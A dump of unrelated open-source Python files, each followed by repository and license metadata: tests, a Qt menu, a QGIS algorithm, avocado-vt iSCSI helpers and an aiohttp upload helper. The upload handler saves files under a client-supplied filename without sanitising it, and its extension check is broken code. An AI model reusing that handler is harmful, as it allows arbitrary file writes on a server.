provision_request = appliance.collections.requests.instantiate(request_description,
partial_check=True)
provision_request.wait_for_request(num_sec=3600)
msg = "Provisioning failed with the message {}".format(provision_request.rest.message)
assert provision_request.is_succeeded(), msg
| anurag03/integration_tests | cfme/tests/services/test_pxe_service_catalogs.py | Python | gpl-2.0 | 5,998 |
#!/usr/bin/python
import apt_pkg
import logging
import os
import mock
import sys
import tempfile
import unittest
sys.path.insert(0, "..")
from unattended_upgrade import _setup_logging
class MockOptions:
dry_run = False
debug = False
class TestLogdir(unittest.TestCase):
def setUp(self):
self.tempdir = tempfile.mkdtemp()
apt_pkg.init()
self.mock_options = MockOptions()
def test_logdir(self):
# test log
logdir = os.path.join(self.tempdir, "mylog")
apt_pkg.config.set("Unattended-Upgrade::LogDir", logdir)
logging.root.handlers = []
_setup_logging(self.mock_options)
self.assertTrue(os.path.exists(logdir))
def test_logdir_depreated(self):
# test if the deprecated APT::UnattendedUpgrades dir is not used
# if the new UnaUnattendedUpgrades::LogDir is given
logdir = os.path.join(self.tempdir, "mylog-use")
logdir2 = os.path.join(self.tempdir, "mylog-dontuse")
apt_pkg.config.set("Unattended-Upgrade::LogDir", logdir)
apt_pkg.config.set("APT::UnattendedUpgrades::LogDir", logdir2)
logging.root.handlers = []
_setup_logging(self.mock_options)
self.assertTrue(os.path.exists(logdir))
self.assertFalse(os.path.exists(logdir2))
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
unittest.main()
| Jimdo/unattended-upgrades | test/test_logdir.py | Python | gpl-2.0 | 1,396 |
import os
import re
import mimetypes
from collections import namedtuple
from aiohttp import web
from app.lib.helpers import (
http400,
http404,
)
DEFAULT_CONTENT_TYPE = 'application/octet-stream'
FILENAME_PARSER = re.compile(r"(?P<id>\d+)_(?P<name>.+)\.(?P<format>.+)")
ParsedFile = namedtuple('ParsedFile', [
'original_name', 'id', 'name'
])
def parse_filename(filename: str):
if not filename:
return
match = FILENAME_PARSER.match(filename)
if match is not None:
id, name, frmt = match.groups()
return ParsedFile(
"{}_{}.{}".format(id, name, frmt),
id,
"{}.{}".format(name, frmt),
)
def get_cache_headers():
return {
"Cache-Control": "public, max-age=31536000",
"Etag": "'CacheForever'",
"Last-Modified": "Wed, 21 Oct 2015 07:28:00 GMT"
}
def get_no_cache_headers():
return {
"Cache-Control": "no-store, no-cache, max-age=0",
"Pragma": "no-cache",
}
def get_file_headers(file_name):
type, _ = mimetypes.guess_type(file_name)
headers = {
"Content-Type": "{}"
.format(type),
"Content-Disposition": 'attachment;filename="{}"'
.format(file_name),
}
return headers
def get_non_cached_file_headers(file_name):
headers = get_file_headers(file_name)
headers.update(**get_no_cache_headers())
return headers
def get_cached_file_headers(file_name):
headers = get_file_headers(file_name)
headers.update(**get_cache_headers())
return headers
def allowed_file(filename):
return (
'.' in filename
and filename.rsplit('.', 1)[1] in {
[
'bmp', 'eps', 'icns', 'im', 'msp', 'pcx', 'ppm',
'png', 'tiff', 'ico', 'jpg', 'jpeg', 'gif',
]
}
)
def file_response(name, body, source):
if body is None:
return http404()
return web.Response(
body=body,
headers={
'X-File-Source': source,
**get_file_headers(name)
}
)
async def store_mp3_handler(request):
reader = await request.multipart()
# /!\ Don't forget to validate your inputs /!\
file = await reader.next()
filename = file.filename
if not allowed_file(filename):
return http400()
# You cannot rely on Content-Length if transfer is chunked.
size = 0
with open(os.path.join('/media/', filename), 'wb') as f:
while True:
chunk = await file.read_chunk() # 8192 bytes by default.
if not chunk:
break
size += len(chunk)
f.write(chunk)
return web.Response(
text='{} sized of {} successfully stored'.format(filename, size)
)
| cpwr/mediasite | app/lib/file.py | Python | gpl-2.0 | 2,779 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from gui.dwidgets import DMenu
class SettingsMenu(DMenu):
"""docstring for SettingsMenu"""
def __init__(self, parent=None):
super(SettingsMenu, self).__init__(parent)
self.parent = parent
self.menuItems = [
{
'name': self.tr('Login'),
'icon': u'',
'shortcut': u'',
'trigger': 'Login',
},
{
'name': self.tr('Show suspension window'),
'icon': u'',
'shortcut': u'',
'trigger': 'Suspension',
},
{
'name': self.tr('Show float window'),
'icon': u'',
'shortcut': u'',
'trigger': 'Float',
},
{
'name': self.tr('Show Dock window'),
'icon': u'',
'shortcut': u'',
'trigger': 'Dock',
},
{
'name': self.tr('Language'),
'trigger': 'Language',
'type': 'submenu',
'actions': [
{
'name': 'English',
'icon': u'',
'shortcut': u'',
'trigger': 'English',
"checkable": True
},
{
'name': 'Chinese',
'icon': u'',
'shortcut': u'',
'trigger': 'Chinese',
"checkable": True
},
]
},
{
'name': self.tr('Document'),
'trigger': 'Document',
'type': 'submenu',
'actions': [
{
'name': 'Android developer guide',
'icon': u'',
'shortcut': u'',
'trigger': 'AndroidDeveloper',
"checkable": False
},
{
'name': 'iOS developer guide',
'icon': u'',
'shortcut': u'',
'trigger': 'IOSDeveloper',
"checkable": False
},
{
'name': 'Ford developer center',
'icon': u'',
'shortcut': u'',
'trigger': 'FordDeveloper',
"checkable": False
},
]
},
{
'name': self.tr('ObjectView'),
'icon': u'',
'shortcut': u'',
'trigger': 'ObjectView',
},
{
'name': self.tr('About'),
'icon': u'',
'shortcut': u'Qt.Key_F12',
'trigger': 'About',
},
{
'name': self.tr('Exit'),
'icon': u'',
'shortcut': u'',
'trigger': 'Exit',
},
]
self.creatMenus(self.menuItems)
self.initConnect()
getattr(self, '%sAction' % 'English').setChecked(True)
def initConnect(self):
for item in ['English', 'Chinese']:
getattr(self, '%sAction' % item).triggered.connect(self.updateChecked)
def updateChecked(self):
for item in ['English', 'Chinese']:
action = getattr(self, '%sAction' % item)
if self.sender() is action:
action.setChecked(True)
else:
action.setChecked(False)
| dragondjf/musicplayer | gui/menus/settingsmenu.py | Python | gpl-2.0 | 3,819 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
FindProjection.py
-----------------
Date : February 2017
Copyright : (C) 2017 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'February 2017'
__copyright__ = '(C) 2017, Nyall Dawson'
import os
from qgis.core import (QgsGeometry,
QgsFeature,
QgsFeatureSink,
QgsField,
QgsFields,
QgsCoordinateReferenceSystem,
QgsCoordinateTransform,
QgsCoordinateTransformContext,
QgsWkbTypes,
QgsProcessingException,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterExtent,
QgsProcessingParameterCrs,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterDefinition)
from qgis.PyQt.QtCore import QVariant
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class FindProjection(QgisAlgorithm):
INPUT = 'INPUT'
TARGET_AREA = 'TARGET_AREA'
TARGET_AREA_CRS = 'TARGET_AREA_CRS'
OUTPUT = 'OUTPUT'
def tags(self):
return self.tr('crs,srs,coordinate,reference,system,guess,estimate,finder,determine').split(',')
def group(self):
return self.tr('Vector general')
def groupId(self):
return 'vectorgeneral'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT,
self.tr('Input layer')))
extent_parameter = QgsProcessingParameterExtent(self.TARGET_AREA,
self.tr('Target area for layer'))
self.addParameter(extent_parameter)
# deprecated
crs_param = QgsProcessingParameterCrs(self.TARGET_AREA_CRS, 'Target area CRS', optional=True)
crs_param.setFlags(crs_param.flags() | QgsProcessingParameterDefinition.FlagHidden)
self.addParameter(crs_param)
self.addParameter(QgsProcessingParameterFeatureSink(self.OUTPUT,
self.tr('CRS candidates')))
def name(self):
return 'findprojection'
def displayName(self):
return self.tr('Find projection')
def processAlgorithm(self, parameters, context, feedback):
source = self.parameterAsSource(parameters, self.INPUT, context)
if source is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT))
extent = self.parameterAsExtent(parameters, self.TARGET_AREA, context)
target_crs = self.parameterAsExtentCrs(parameters, self.TARGET_AREA, context)
if self.TARGET_AREA_CRS in parameters:
c = self.parameterAsCrs(parameters, self.TARGET_AREA_CRS, context)
if c.isValid():
target_crs = c
target_geom = QgsGeometry.fromRect(extent)
fields = QgsFields()
fields.append(QgsField('auth_id', QVariant.String, '', 20))
(sink, dest_id) = self.parameterAsSink(parameters, self.OUTPUT, context,
fields, QgsWkbTypes.NoGeometry, QgsCoordinateReferenceSystem())
if sink is None:
raise QgsProcessingException(self.invalidSinkError(parameters, self.OUTPUT))
# make intersection tests nice and fast
engine = QgsGeometry.createGeometryEngine(target_geom.constGet())
engine.prepareGeometry()
layer_bounds = QgsGeometry.fromRect(source.sourceExtent())
crses_to_check = QgsCoordinateReferenceSystem.validSrsIds()
total = 100.0 / len(crses_to_check)
found_results = 0
transform_context = QgsCoordinateTransformContext()
for current, srs_id in enumerate(crses_to_check):
if feedback.isCanceled():
break
candidate_crs = QgsCoordinateReferenceSystem.fromSrsId(srs_id)
if not candidate_crs.isValid():
continue
transform_candidate = QgsCoordinateTransform(candidate_crs, target_crs, transform_context)
transform_candidate.setBallparkTransformsAreAppropriate(True)
transform_candidate.disableFallbackOperationHandler(True)
transformed_bounds = QgsGeometry(layer_bounds)
try:
if not transformed_bounds.transform(transform_candidate) == 0:
continue
except:
continue
try:
if engine.intersects(transformed_bounds.constGet()):
feedback.pushInfo(self.tr('Found candidate CRS: {}').format(candidate_crs.authid()))
f = QgsFeature(fields)
f.setAttributes([candidate_crs.authid()])
sink.addFeature(f, QgsFeatureSink.FastInsert)
found_results += 1
except:
continue
feedback.setProgress(int(current * total))
if found_results == 0:
feedback.reportError(self.tr('No matching projections found'))
return {self.OUTPUT: dest_id}
| lbartoletti/QGIS | python/plugins/processing/algs/qgis/FindProjection.py | Python | gpl-2.0 | 6,167 |
"""
Basic iscsi support for Linux host with the help of commands
iscsiadm and tgtadm.
This include the basic operates such as login and get device name by
target name. And it can support the real iscsi access and emulated
iscsi in localhost then access it.
"""
import re
import os
import logging
from avocado.core import exceptions
from avocado.utils import data_factory
from avocado.utils import process
from avocado.utils import path
from . import utils_selinux
from . import utils_net
from . import data_dir
ISCSI_CONFIG_FILE = "/etc/iscsi/initiatorname.iscsi"
def iscsi_get_sessions():
"""
Get the iscsi sessions activated
"""
cmd = "iscsiadm --mode session"
output = process.system_output(cmd, ignore_status=True)
sessions = []
if "No active sessions" not in output:
for session in output.splitlines():
ip_addr = session.split()[2].split(',')[0]
target = session.split()[3]
sessions.append((ip_addr, target))
return sessions
def iscsi_get_nodes():
"""
Get the iscsi nodes
"""
cmd = "iscsiadm --mode node"
output = process.system_output(cmd, ignore_status=True)
pattern = r"(\d+\.\d+\.\d+\.\d+|\[.+\]):\d+,\d+\s+([\w\.\-:\d]+)"
nodes = []
if "No records found" not in output:
nodes = re.findall(pattern, output)
return nodes
def iscsi_login(target_name, portal):
"""
Login to a target with the target name
:param target_name: Name of the target
:params portal: Hostname/Ip for iscsi server
"""
cmd = "iscsiadm --mode node --login --targetname %s" % target_name
cmd += " --portal %s" % portal
output = process.system_output(cmd)
target_login = ""
if "successful" in output:
target_login = target_name
return target_login
def iscsi_node_del(target_name=None):
"""
Delete target node record, if the target name is not set then delete
all target node records.
:params target_name: Name of the target.
"""
node_list = iscsi_get_nodes()
cmd = ''
if target_name:
for node_tup in node_list:
if target_name in node_tup:
cmd = "iscsiadm -m node -o delete -T %s " % target_name
cmd += "--portal %s" % node_tup[0]
process.system(cmd, ignore_status=True)
break
if not cmd:
logging.error("The target '%s' for delete is not in target node"
" record", target_name)
else:
for node_tup in node_list:
cmd = "iscsiadm -m node -o delete -T %s " % node_tup[1]
cmd += "--portal %s" % node_tup[0]
process.system(cmd, ignore_status=True)
def iscsi_logout(target_name=None):
"""
Logout from a target. If the target name is not set then logout all
targets.
:params target_name: Name of the target.
"""
if target_name:
cmd = "iscsiadm --mode node --logout -T %s" % target_name
else:
cmd = "iscsiadm --mode node --logout all"
output = process.system_output(cmd)
target_logout = ""
if "successful" in output:
target_logout = target_name
return target_logout
def iscsi_discover(portal_ip):
"""
Query from iscsi server for available targets
:param portal_ip: Ip for iscsi server
"""
cmd = "iscsiadm -m discovery -t sendtargets -p %s" % portal_ip
output = process.system_output(cmd, ignore_status=True)
session = ""
if "Invalid" in output:
logging.debug(output)
else:
session = output
return session
class _IscsiComm(object):
"""
Provide an interface to complete the similar initialization
"""
def __init__(self, params, root_dir):
"""
common __init__ function used to initialize iSCSI service
:param params: parameters dict for iSCSI
:param root_dir: path for image
"""
self.target = params.get("target")
self.export_flag = False
self.luns = None
self.restart_tgtd = 'yes' == params.get("restart_tgtd", "no")
if params.get("portal_ip"):
self.portal_ip = params.get("portal_ip")
else:
self.portal_ip = "127.0.0.1"
if params.get("iscsi_thread_id"):
self.id = params.get("iscsi_thread_id")
else:
self.id = data_factory.generate_random_string(4)
self.initiator = params.get("initiator")
# CHAP AUTHENTICATION
self.chap_flag = False
self.chap_user = params.get("chap_user")
self.chap_passwd = params.get("chap_passwd")
if self.chap_user and self.chap_passwd:
self.chap_flag = True
if params.get("emulated_image"):
self.initiator = None
emulated_image = params.get("emulated_image")
self.emulated_image = os.path.join(root_dir, emulated_image)
self.device = "device.%s" % os.path.basename(self.emulated_image)
self.emulated_id = ""
self.emulated_size = params.get("image_size")
self.unit = self.emulated_size[-1].upper()
self.emulated_size = self.emulated_size[:-1]
# maps K,M,G,T => (count, bs)
emulated_size = {'K': (1, 1),
'M': (1, 1024),
'G': (1024, 1024),
'T': (1024, 1048576),
}
if emulated_size.has_key(self.unit):
block_size = emulated_size[self.unit][1]
size = int(self.emulated_size) * emulated_size[self.unit][0]
self.emulated_expect_size = block_size * size
self.create_cmd = ("dd if=/dev/zero of=%s count=%s bs=%sK"
% (self.emulated_image, size, block_size))
else:
self.device = None
def logged_in(self):
"""
Check if the session is login or not.
"""
sessions = iscsi_get_sessions()
login = False
if self.target in map(lambda x: x[1], sessions):
login = True
return login
def portal_visible(self):
"""
Check if the portal can be found or not.
"""
return bool(re.findall("%s$" % self.target,
iscsi_discover(self.portal_ip), re.M))
def set_initiatorName(self, id, name):
"""
back up and set up the InitiatorName
"""
if os.path.isfile("%s" % ISCSI_CONFIG_FILE):
logging.debug("Try to update iscsi initiatorname")
cmd = "mv %s %s-%s" % (ISCSI_CONFIG_FILE, ISCSI_CONFIG_FILE, id)
process.system(cmd)
fd = open(ISCSI_CONFIG_FILE, 'w')
fd.write("InitiatorName=%s" % name)
fd.close()
process.system("service iscsid restart")
def login(self):
"""
Login session for both real iscsi device and emulated iscsi.
Include env check and setup.
"""
login_flag = False
if self.portal_visible():
login_flag = True
elif self.initiator:
self.set_initiatorName(id=self.id, name=self.initiator)
if self.portal_visible():
login_flag = True
elif self.emulated_image:
self.export_target()
# If both iSCSI server and iSCSI client are on localhost.
# It's necessary to set up the InitiatorName.
if "127.0.0.1" in self.portal_ip:
self.set_initiatorName(id=self.id, name=self.target)
if self.portal_visible():
login_flag = True
if login_flag:
iscsi_login(self.target, self.portal_ip)
def get_device_name(self):
"""
Get device name from the target name.
"""
cmd = "iscsiadm -m session -P 3"
device_name = ""
if self.logged_in():
output = process.system_output(cmd)
pattern = r"Target:\s+%s.*?disk\s(\w+)\s+\S+\srunning" % self.target
device_name = re.findall(pattern, output, re.S)
try:
device_name = "/dev/%s" % device_name[0]
except IndexError:
logging.error(
"Can not find target '%s' after login.", self.target)
else:
logging.error("Session is not logged in yet.")
return device_name
def set_chap_auth_initiator(self):
"""
Set CHAP authentication for initiator.
"""
name_dict = {'node.session.auth.authmethod': 'CHAP'}
name_dict['node.session.auth.username'] = self.chap_user
name_dict['node.session.auth.password'] = self.chap_passwd
for name in name_dict.keys():
cmd = "iscsiadm --mode node --targetname %s " % self.target
cmd += "--op update --name %s --value %s" % (name, name_dict[name])
try:
process.system(cmd)
except process.CmdError:
logging.error("Fail to set CHAP authentication for initiator")
def logout(self):
"""
Logout from target.
"""
if self.logged_in():
iscsi_logout(self.target)
def cleanup(self):
"""
Clean up env after iscsi used.
"""
self.logout()
iscsi_node_del(self.target)
if os.path.isfile("%s-%s" % (ISCSI_CONFIG_FILE, self.id)):
cmd = "mv %s-%s %s" % (ISCSI_CONFIG_FILE, self.id, ISCSI_CONFIG_FILE)
process.system(cmd)
cmd = "service iscsid restart"
process.system(cmd)
if self.export_flag:
self.delete_target()
class IscsiTGT(_IscsiComm):
"""
iscsi support TGT backend used in RHEL6.
"""
def __init__(self, params, root_dir):
"""
initialize TGT backend for iSCSI
:param params: parameters dict for TGT backend of iSCSI.
"""
super(IscsiTGT, self).__init__(params, root_dir)
def get_target_id(self):
"""
Get target id from image name. Only works for emulated iscsi device
"""
cmd = "tgtadm --lld iscsi --mode target --op show"
target_info = process.system_output(cmd)
target_id = ""
for line in re.split("\n", target_info):
if re.findall("Target\s+(\d+)", line):
target_id = re.findall("Target\s+(\d+)", line)[0]
if re.findall("Backing store path:\s+(/+.+)", line):
if self.emulated_image in line:
break
else:
target_id = ""
return target_id
def get_chap_accounts(self):
"""
Get all CHAP authentication accounts
"""
cmd = "tgtadm --lld iscsi --op show --mode account"
all_accounts = process.system_output(cmd)
if all_accounts:
all_accounts = map(str.strip, all_accounts.splitlines()[1:])
return all_accounts
def add_chap_account(self):
"""
Add CHAP authentication account
"""
try:
cmd = "tgtadm --lld iscsi --op new --mode account"
cmd += " --user %s" % self.chap_user
cmd += " --password %s" % self.chap_passwd
process.system(cmd)
except process.CmdError, err:
logging.error("Fail to add account: %s", err)
# Check the new add account exist
if self.chap_user not in self.get_chap_accounts():
logging.error("Can't find account %s" % self.chap_user)
def delete_chap_account(self):
"""
Delete the CHAP authentication account
"""
if self.chap_user in self.get_chap_accounts():
cmd = "tgtadm --lld iscsi --op delete --mode account"
cmd += " --user %s" % self.chap_user
process.system(cmd)
def get_target_account_info(self):
"""
Get the target account information
"""
cmd = "tgtadm --lld iscsi --mode target --op show"
target_info = process.system_output(cmd)
pattern = r"Target\s+\d:\s+%s" % self.target
pattern += ".*Account information:\s(.*)ACL information"
try:
target_account = re.findall(pattern, target_info,
re.S)[0].strip().splitlines()
except IndexError:
target_account = []
return map(str.strip, target_account)
def set_chap_auth_target(self):
"""
Set CHAP authentication on a target, it will require authentication
before an initiator is allowed to log in and access devices.
"""
if self.chap_user not in self.get_chap_accounts():
self.add_chap_account()
if self.chap_user in self.get_target_account_info():
logging.debug("Target %s already has account %s", self.target,
self.chap_user)
else:
cmd = "tgtadm --lld iscsi --op bind --mode account"
cmd += " --tid %s --user %s" % (self.emulated_id, self.chap_user)
process.system(cmd)
def export_target(self):
"""
Export target in localhost for emulated iscsi
"""
selinux_mode = None
if not os.path.isfile(self.emulated_image):
process.system(self.create_cmd)
else:
emulated_image_size = os.path.getsize(self.emulated_image) / 1024
if emulated_image_size != self.emulated_expect_size:
# No need to remvoe, rebuild is fine
process.system(self.create_cmd)
cmd = "tgtadm --lld iscsi --mode target --op show"
try:
output = process.system_output(cmd)
except process.CmdError:
process.system("service tgtd restart")
output = process.system_output(cmd)
if not re.findall("%s$" % self.target, output, re.M):
logging.debug("Need to export target in host")
# Set selinux to permissive mode to make sure iscsi target
# export successfully
if utils_selinux.is_enforcing():
selinux_mode = utils_selinux.get_status()
utils_selinux.set_status("permissive")
output = process.system_output(cmd)
used_id = re.findall("Target\s+(\d+)", output)
emulated_id = 1
while str(emulated_id) in used_id:
emulated_id += 1
self.emulated_id = str(emulated_id)
cmd = "tgtadm --mode target --op new --tid %s" % self.emulated_id
cmd += " --lld iscsi --targetname %s" % self.target
process.system(cmd)
cmd = "tgtadm --lld iscsi --op bind --mode target "
cmd += "--tid %s -I ALL" % self.emulated_id
process.system(cmd)
else:
target_strs = re.findall("Target\s+(\d+):\s+%s$" %
self.target, output, re.M)
self.emulated_id = target_strs[0].split(':')[0].split()[-1]
cmd = "tgtadm --lld iscsi --mode target --op show"
try:
output = process.system_output(cmd)
except process.CmdError: # In case service stopped
process.system("service tgtd restart")
output = process.system_output(cmd)
# Create a LUN with emulated image
if re.findall(self.emulated_image, output, re.M):
# Exist already
logging.debug("Exported image already exists.")
self.export_flag = True
else:
tgt_str = re.search(r'.*(Target\s+\d+:\s+%s\s*.*)$' % self.target,
output, re.DOTALL)
if tgt_str:
luns = len(re.findall("\s+LUN:\s(\d+)",
tgt_str.group(1), re.M))
else:
luns = len(re.findall("\s+LUN:\s(\d+)", output, re.M))
cmd = "tgtadm --mode logicalunit --op new "
cmd += "--tid %s --lld iscsi " % self.emulated_id
cmd += "--lun %s " % luns
cmd += "--backing-store %s" % self.emulated_image
process.system(cmd)
self.export_flag = True
self.luns = luns
# Restore selinux
if selinux_mode is not None:
utils_selinux.set_status(selinux_mode)
if self.chap_flag:
# Set CHAP authentication on the exported target
self.set_chap_auth_target()
# Set CHAP authentication for initiator to login target
if self.portal_visible():
self.set_chap_auth_initiator()
def delete_target(self):
"""
Delete target from host.
"""
cmd = "tgtadm --lld iscsi --mode target --op show"
output = process.system_output(cmd)
if re.findall("%s$" % self.target, output, re.M):
if self.emulated_id:
cmd = "tgtadm --lld iscsi --mode target --op delete "
cmd += "--tid %s" % self.emulated_id
process.system(cmd)
if self.restart_tgtd:
cmd = "service tgtd restart"
process.system(cmd)
class IscsiLIO(_IscsiComm):
"""
iscsi support class for LIO backend used in RHEL7.
"""
def __init__(self, params, root_dir):
"""
initialize LIO backend for iSCSI
:param params: parameters dict for LIO backend of iSCSI
"""
super(IscsiLIO, self).__init__(params, root_dir)
def get_target_id(self):
"""
Get target id from image name.
"""
cmd = "targetcli ls /iscsi 1"
target_info = process.system_output(cmd)
target = None
for line in re.split("\n", target_info)[1:]:
if re.findall("o-\s\S+\s[\.]+\s\[TPGs:\s\d\]$", line):
# eg: iqn.2015-05.com.example:iscsi.disk
try:
target = re.findall("iqn[\.]\S+:\S+", line)[0]
except IndexError:
logging.info("No found target in %s", line)
continue
else:
continue
cmd = "targetcli ls /iscsi/%s/tpg1/luns" % target
luns_info = process.system_output(cmd)
for lun_line in re.split("\n", luns_info):
if re.findall("o-\slun\d+", lun_line):
if self.emulated_image in lun_line:
break
else:
target = None
return target
def set_chap_acls_target(self):
"""
set CHAP(acls) authentication on a target.
it will require authentication
before an initiator is allowed to log in and access devices.
notice:
Individual ACL entries override common TPG Authentication,
which can be set by set_chap_auth_target().
"""
# Enable ACL nodes
acls_cmd = "targetcli /iscsi/%s/tpg1/ " % self.target
attr_cmd = "set attribute generate_node_acls=0"
process.system(acls_cmd + attr_cmd)
# Create user and allow access
acls_cmd = ("targetcli /iscsi/%s/tpg1/acls/ create %s:client"
% (self.target, self.target.split(":")[0]))
output = process.system_output(acls_cmd)
if "Created Node ACL" not in output:
raise exceptions.TestFail("Failed to create ACL. (%s)" % output)
comm_cmd = ("targetcli /iscsi/%s/tpg1/acls/%s:client/"
% (self.target, self.target.split(":")[0]))
# Set userid
userid_cmd = "%s set auth userid=%s" % (comm_cmd, self.chap_user)
output = process.system_output(userid_cmd)
if self.chap_user not in output:
raise exceptions.TestFail("Failed to set user. (%s)" % output)
# Set password
passwd_cmd = "%s set auth password=%s" % (comm_cmd, self.chap_passwd)
output = process.system_output(passwd_cmd)
if self.chap_passwd not in output:
raise exceptions.TestFail("Failed to set password. (%s)" % output)
# Save configuration
process.system("targetcli / saveconfig")
def set_chap_auth_target(self):
"""
set up authentication information for every single initiator,
which provides the capability to define common login information
for all Endpoints in a TPG
"""
auth_cmd = "targetcli /iscsi/%s/tpg1/ " % self.target
attr_cmd = ("set attribute %s %s %s" %
("demo_mode_write_protect=0",
"generate_node_acls=1",
"cache_dynamic_acls=1"))
process.system(auth_cmd + attr_cmd)
# Set userid
userid_cmd = "%s set auth userid=%s" % (auth_cmd, self.chap_user)
output = process.system_output(userid_cmd)
if self.chap_user not in output:
raise exceptions.TestFail("Failed to set user. (%s)" % output)
# Set password
passwd_cmd = "%s set auth password=%s" % (auth_cmd, self.chap_passwd)
output = process.system_output(passwd_cmd)
if self.chap_passwd not in output:
raise exceptions.TestFail("Failed to set password. (%s)" % output)
# Save configuration
process.system("targetcli / saveconfig")
def export_target(self):
"""
Export target in localhost for emulated iscsi
"""
selinux_mode = None
# create image disk
if not os.path.isfile(self.emulated_image):
process.system(self.create_cmd)
else:
emulated_image_size = os.path.getsize(self.emulated_image) / 1024
if emulated_image_size != self.emulated_expect_size:
# No need to remvoe, rebuild is fine
process.system(self.create_cmd)
# confirm if the target exists and create iSCSI target
cmd = "targetcli ls /iscsi 1"
output = process.system_output(cmd)
if not re.findall("%s$" % self.target, output, re.M):
logging.debug("Need to export target in host")
# Set selinux to permissive mode to make sure
# iscsi target export successfully
if utils_selinux.is_enforcing():
selinux_mode = utils_selinux.get_status()
utils_selinux.set_status("permissive")
# In fact, We've got two options here
#
# 1) Create a block backstore that usually provides the best
# performance. We can use a block device like /dev/sdb or
# a logical volume previously created,
# (lvcreate -name lv_iscsi -size 1G vg)
# 2) Create a fileio backstore,
# which enables the local file system cache.
#
# This class Only works for emulated iscsi device,
# So fileio backstore is enough and safe.
# Create a fileio backstore
device_cmd = ("targetcli /backstores/fileio/ create %s %s" %
(self.device, self.emulated_image))
output = process.system_output(device_cmd)
if "Created fileio" not in output:
raise exceptions.TestFail("Failed to create fileio %s. (%s)" %
(self.device, output))
# Create an IQN with a target named target_name
target_cmd = "targetcli /iscsi/ create %s" % self.target
output = process.system_output(target_cmd)
if "Created target" not in output:
raise exceptions.TestFail("Failed to create target %s. (%s)" %
(self.target, output))
check_portal = "targetcli /iscsi/%s/tpg1/portals ls" % self.target
portal_info = process.system_output(check_portal)
if "0.0.0.0:3260" not in portal_info:
# Create portal
# 0.0.0.0 means binding to INADDR_ANY
# and using default IP port 3260
portal_cmd = ("targetcli /iscsi/%s/tpg1/portals/ create %s"
% (self.target, "0.0.0.0"))
output = process.system_output(portal_cmd)
if "Created network portal" not in output:
raise exceptions.TestFail("Failed to create portal. (%s)" %
output)
if ("ipv6" == utils_net.IPAddress(self.portal_ip).version and
self.portal_ip not in portal_info):
# Ipv6 portal address can't be created by default,
# create ipv6 portal if needed.
portal_cmd = ("targetcli /iscsi/%s/tpg1/portals/ create %s"
% (self.target, self.portal_ip))
output = process.system_output(portal_cmd)
if "Created network portal" not in output:
raise exceptions.TestFail("Failed to create portal. (%s)" %
output)
# Create lun
lun_cmd = "targetcli /iscsi/%s/tpg1/luns/ " % self.target
dev_cmd = "create /backstores/fileio/%s" % self.device
output = process.system_output(lun_cmd + dev_cmd)
luns = re.findall(r"Created LUN (\d+).", output)
if not luns:
raise exceptions.TestFail("Failed to create lun. (%s)" %
output)
self.luns = luns[0]
# Set firewall if it's enabled
output = process.system_output("firewall-cmd --state",
ignore_status=True)
if re.findall("^running", output, re.M):
# firewall is running
process.system("firewall-cmd --permanent --add-port=3260/tcp")
process.system("firewall-cmd --reload")
# Restore selinux
if selinux_mode is not None:
utils_selinux.set_status(selinux_mode)
self.export_flag = True
else:
logging.info("Target %s has already existed!" % self.target)
if self.chap_flag:
# Set CHAP authentication on the exported target
self.set_chap_auth_target()
# Set CHAP authentication for initiator to login target
if self.portal_visible():
self.set_chap_auth_initiator()
else:
# To enable that so-called "demo mode" TPG operation,
# disable all authentication for the corresponding Endpoint.
# which means grant access to all initiators,
# so that they can access all LUNs in the TPG
# without further authentication.
auth_cmd = "targetcli /iscsi/%s/tpg1/ " % self.target
attr_cmd = ("set attribute %s %s %s %s" %
("authentication=0",
"demo_mode_write_protect=0",
"generate_node_acls=1",
"cache_dynamic_acls=1"))
output = process.system_output(auth_cmd + attr_cmd)
logging.info("Define access rights: %s" % output)
# Save configuration
process.system("targetcli / saveconfig")
# Restart iSCSI service
process.system("systemctl restart iscsid.service")
def delete_target(self):
"""
Delete target from host.
"""
# Delete block
if self.device is not None:
cmd = "targetcli /backstores/fileio ls"
output = process.system_output(cmd)
if re.findall("%s" % self.device, output, re.M):
dev_del = ("targetcli /backstores/fileio/ delete %s"
% self.device)
process.system(dev_del)
# Delete IQN
cmd = "targetcli ls /iscsi 1"
output = process.system_output(cmd)
if re.findall("%s" % self.target, output, re.M):
del_cmd = "targetcli /iscsi delete %s" % self.target
process.system(del_cmd)
# Save deleted configuration to avoid restoring
cmd = "targetcli / saveconfig"
process.system(cmd)
class Iscsi(object):
"""
Basic iSCSI support class,
which will handle the emulated iscsi export and
access to both real iscsi and emulated iscsi device.
The class support different kinds of iSCSI backend (TGT and LIO),
and return ISCSI instance.
"""
@staticmethod
def create_iSCSI(params, root_dir=data_dir.get_tmp_dir()):
iscsi_instance = None
try:
path.find_command("iscsiadm")
path.find_command("tgtadm")
iscsi_instance = IscsiTGT(params, root_dir)
except path.CmdNotFoundError:
try:
path.find_command("iscsiadm")
path.find_command("targetcli")
iscsi_instance = IscsiLIO(params, root_dir)
except path.CmdNotFoundError:
pass
return iscsi_instance
| vipmike007/avocado-vt | virttest/iscsi.py | Python | gpl-2.0 | 29,173 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import print_function
# python standard library
from socket import socket
import sys, os, re, stat, math, time, datetime
import importlib
# third party modules
try: # unicode monkeypatch for windoze
import win_unicode_console
win_unicode_console.enable()
except:
msg = "Please install the 'win_unicode_console' module."
if os.name == 'nt': print(msg)
try: # os independent color support
from colorama import init, Fore, Back, Style
init() # required to get colors on windoze
except ImportError:
msg = "Please install the 'colorama' module for color support."
# poor man's colored output (ANSI)
class Back():
BLUE = '\x1b[44m' if os.name == 'posix' else ''
CYAN = '\x1b[46m' if os.name == 'posix' else ''
